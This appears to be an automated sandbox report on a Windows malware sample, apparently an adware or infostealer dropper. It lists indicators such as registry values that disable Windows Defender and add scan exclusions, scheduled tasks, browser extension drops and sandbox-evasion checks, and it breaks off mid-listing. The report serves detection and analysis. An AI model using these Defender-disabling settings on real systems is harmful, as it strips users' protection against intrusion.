Analysis
-
max time kernel
170s -
max time network
174s -
platform
windows7_x64 -
resource
win7-20230703-en -
resource tags
arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system -
submitted
05/07/2023, 22:27
Static task
static1
Behavioral task
behavioral1
Sample
96549bc3b25487075ad20e2575e6d55c47cb917dec7bf93ee69f6ba770855f73.exe
Resource
win7-20230703-en
General
-
Target
96549bc3b25487075ad20e2575e6d55c47cb917dec7bf93ee69f6ba770855f73.exe
-
Size
7.2MB
-
MD5
8da055736be3109aebfcd7ec82206343
-
SHA1
cd5918034af65d476c788cbf3783085818714f51
-
SHA256
96549bc3b25487075ad20e2575e6d55c47cb917dec7bf93ee69f6ba770855f73
-
SHA512
c2a9da581873ea0cc32ec39481089c57c7030496c3a77d5d4aef469a17ce840e7d566d2c89d9c90782e715dc8885fb0efde88f9d7a88b16ed8ad13a1c306a7fb
-
SSDEEP
196608:91Ofexq0MiUCUvZgOHxvYxYnksMG7TMAVf1sGUOGzM37WzH4UV9vH7NGE:3OfeMaSeORvVMwp1jkgGYUPzNx
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HfPaSUeHU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cLiUTEHkTdUU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\WckEBxbmAYthbbDXY = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\tSkdRfYqneaszoCN = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\tSkdRfYqneaszoCN = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\EJLOJmqcxNMyUMVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\tSkdRfYqneaszoCN = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DaigJzLtIdVhYyWmoPR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FfbRhZLOhCYvC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\WckEBxbmAYthbbDXY = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HfPaSUeHU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kHJwzzblBfUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kHJwzzblBfUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\cLiUTEHkTdUU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\tSkdRfYqneaszoCN = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\FfbRhZLOhCYvC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DaigJzLtIdVhYyWmoPR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\EJLOJmqcxNMyUMVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 22 2260 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1305762978-1813183296-1799492538-1000\Control Panel\International\Geo\Nation XAYAsAQ.exe -
Executes dropped EXE 4 IoCs
pid Process 3032 Install.exe 2088 Install.exe 2968 QUAtrBc.exe 1512 XAYAsAQ.exe -
Loads dropped DLL 12 IoCs
pid Process 2948 96549bc3b25487075ad20e2575e6d55c47cb917dec7bf93ee69f6ba770855f73.exe 3032 Install.exe 3032 Install.exe 3032 Install.exe 3032 Install.exe 2088 Install.exe 2088 Install.exe 2088 Install.exe 2260 rundll32.exe 2260 rundll32.exe 2260 rundll32.exe 2260 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json XAYAsAQ.exe -
Drops file in System32 directory 17 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini QUAtrBc.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol QUAtrBc.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat XAYAsAQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA XAYAsAQ.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA XAYAsAQ.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA XAYAsAQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_8CCCAAF453E2BC1BE9F5F49170752275 XAYAsAQ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol XAYAsAQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol QUAtrBc.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA XAYAsAQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_8CCCAAF453E2BC1BE9F5F49170752275 XAYAsAQ.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\FfbRhZLOhCYvC\luZgCWt.xml XAYAsAQ.exe File created C:\Program Files (x86)\kHJwzzblBfUn\CZNuWjt.dll XAYAsAQ.exe File created C:\Program Files (x86)\HfPaSUeHU\SjjnrZ.dll XAYAsAQ.exe File created C:\Program Files (x86)\cLiUTEHkTdUU2\iSQjjjZnarHZc.dll XAYAsAQ.exe File created C:\Program Files (x86)\cLiUTEHkTdUU2\PoUpzHw.xml XAYAsAQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja XAYAsAQ.exe File created C:\Program Files (x86)\HfPaSUeHU\rUEEnzt.xml XAYAsAQ.exe File created C:\Program Files (x86)\DaigJzLtIdVhYyWmoPR\xjgDJBm.dll XAYAsAQ.exe File created C:\Program Files (x86)\DaigJzLtIdVhYyWmoPR\gTwdEQi.xml XAYAsAQ.exe File created C:\Program Files (x86)\FfbRhZLOhCYvC\MsbJNpl.dll XAYAsAQ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi XAYAsAQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi XAYAsAQ.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak XAYAsAQ.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bxxbXoYHkHGjuhIljt.job schtasks.exe File created C:\Windows\Tasks\RdLmjNtWjKxsLsIur.job schtasks.exe File created C:\Windows\Tasks\UYMKlLeeRMLoSzo.job schtasks.exe File created C:\Windows\Tasks\UHTTgbauCkoiRQjtd.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2128 schtasks.exe 436 schtasks.exe 2596 schtasks.exe 2152 schtasks.exe 1328 schtasks.exe 1380 schtasks.exe 1504 schtasks.exe 2632 schtasks.exe 2148 schtasks.exe 1256 schtasks.exe 2908 schtasks.exe 3068 schtasks.exe 2548 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings XAYAsAQ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0A7B421A-2C38-4397-A140-66675D7F69B9}\WpadDecisionTime = 7044364090afd901 XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-17-7e-87-e6-12 XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings XAYAsAQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs XAYAsAQ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-17-7e-87-e6-12\WpadDecisionReason = "1" XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-17-7e-87-e6-12 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" XAYAsAQ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0086000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0A7B421A-2C38-4397-A140-66675D7F69B9}\72-17-7e-87-e6-12 XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-17-7e-87-e6-12\WpadDecisionTime = 7044364090afd901 XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections XAYAsAQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0A7B421A-2C38-4397-A140-66675D7F69B9}\WpadDecisionReason = "1" XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust XAYAsAQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust XAYAsAQ.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0086000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" XAYAsAQ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\72-17-7e-87-e6-12\WpadDecisionReason = "1" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs XAYAsAQ.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs XAYAsAQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{0A7B421A-2C38-4397-A140-66675D7F69B9}\72-17-7e-87-e6-12 rundll32.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 1648 powershell.EXE 1648 powershell.EXE 1648 powershell.EXE 2836 powershell.EXE 2836 powershell.EXE 2836 powershell.EXE 1632 powershell.EXE 1632 powershell.EXE 1632 powershell.EXE 1676 powershell.EXE 1676 powershell.EXE 1676 powershell.EXE 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe 1512 XAYAsAQ.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1648 powershell.EXE Token: SeDebugPrivilege 2836 powershell.EXE Token: SeDebugPrivilege 1632 powershell.EXE Token: SeDebugPrivilege 1676 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2948 wrote to memory of 3032 2948 96549bc3b25487075ad20e2575e6d55c47cb917dec7bf93ee69f6ba770855f73.exe 28 PID 2948 wrote to memory of 3032 2948 96549bc3b25487075ad20e2575e6d55c47cb917dec7bf93ee69f6ba770855f73.exe 28 PID 2948 wrote to memory of 3032 2948 96549bc3b25487075ad20e2575e6d55c47cb917dec7bf93ee69f6ba770855f73.exe 28 PID 2948 wrote to memory of 3032 2948 96549bc3b25487075ad20e2575e6d55c47cb917dec7bf93ee69f6ba770855f73.exe 28 PID 2948 wrote to memory of 3032 2948 96549bc3b25487075ad20e2575e6d55c47cb917dec7bf93ee69f6ba770855f73.exe 28 PID 2948 wrote to memory of 3032 2948 96549bc3b25487075ad20e2575e6d55c47cb917dec7bf93ee69f6ba770855f73.exe 28 PID 2948 wrote to memory of 3032 2948 96549bc3b25487075ad20e2575e6d55c47cb917dec7bf93ee69f6ba770855f73.exe 28 PID 3032 wrote to memory of 2088 3032 Install.exe 29 PID 3032 wrote to memory of 2088 3032 Install.exe 29 PID 3032 wrote to memory of 2088 3032 Install.exe 29 PID 3032 wrote to memory of 2088 3032 Install.exe 29 PID 3032 wrote to memory of 2088 3032 Install.exe 29 PID 3032 wrote to memory of 2088 3032 Install.exe 29 PID 3032 wrote to memory of 2088 3032 Install.exe 29 PID 2088 wrote to memory of 2352 2088 Install.exe 31 PID 2088 wrote to memory of 2352 2088 Install.exe 31 PID 2088 wrote to memory of 2352 2088 Install.exe 31 PID 2088 wrote to memory of 2352 2088 Install.exe 31 PID 2088 wrote to memory of 2352 2088 Install.exe 31 PID 2088 wrote to memory of 2352 2088 Install.exe 31 PID 2088 wrote to memory of 2352 2088 Install.exe 31 PID 2088 wrote to memory of 2408 2088 Install.exe 33 PID 2088 wrote to memory of 2408 2088 Install.exe 33 PID 2088 wrote to memory of 2408 2088 Install.exe 33 PID 2088 wrote to memory of 2408 2088 Install.exe 33 PID 2088 wrote to memory of 2408 2088 Install.exe 33 PID 2088 wrote to memory of 2408 2088 Install.exe 33 PID 2088 wrote to memory of 2408 2088 Install.exe 33 PID 2352 wrote to memory of 2320 2352 forfiles.exe 34 PID 2352 wrote to memory of 2320 2352 forfiles.exe 34 PID 2352 wrote to memory of 2320 2352 forfiles.exe 34 PID 2352 wrote to memory of 2320 2352 forfiles.exe 34 PID 2352 wrote to memory of 2320 2352 forfiles.exe 34 PID 2352 wrote to memory of 2320 2352 forfiles.exe 34 PID 2352 wrote to memory of 2320 2352 forfiles.exe 34 PID 2320 wrote to memory of 1684 2320 cmd.exe 36 PID 2320 wrote to memory of 1684 2320 cmd.exe 36 PID 2320 wrote to memory of 1684 2320 cmd.exe 36 PID 2320 wrote to memory of 1684 2320 cmd.exe 36 PID 2320 wrote to memory of 1684 2320 cmd.exe 36 PID 2320 wrote to memory of 1684 2320 cmd.exe 36 PID 2320 wrote to memory of 1684 2320 cmd.exe 36 PID 2408 wrote to memory of 2028 2408 forfiles.exe 37 PID 2408 wrote to memory of 2028 2408 forfiles.exe 37 PID 2408 wrote to memory of 2028 2408 forfiles.exe 37 PID 2408 wrote to memory of 2028 2408 forfiles.exe 37 PID 2408 wrote to memory of 2028 2408 forfiles.exe 37 PID 2408 wrote to memory of 2028 2408 forfiles.exe 37 PID 2408 wrote to memory of 2028 2408 forfiles.exe 37 PID 2028 wrote to memory of 972 2028 cmd.exe 38 PID 2028 wrote to memory of 972 2028 cmd.exe 38 PID 2028 wrote to memory of 972 2028 cmd.exe 38 PID 2028 wrote to memory of 972 2028 cmd.exe 38 PID 2028 wrote to memory of 972 2028 cmd.exe 38 PID 2028 wrote to memory of 972 2028 cmd.exe 38 PID 2028 wrote to memory of 972 2028 cmd.exe 38 PID 2320 wrote to memory of 2252 2320 cmd.exe 39 PID 2320 wrote to memory of 2252 2320 cmd.exe 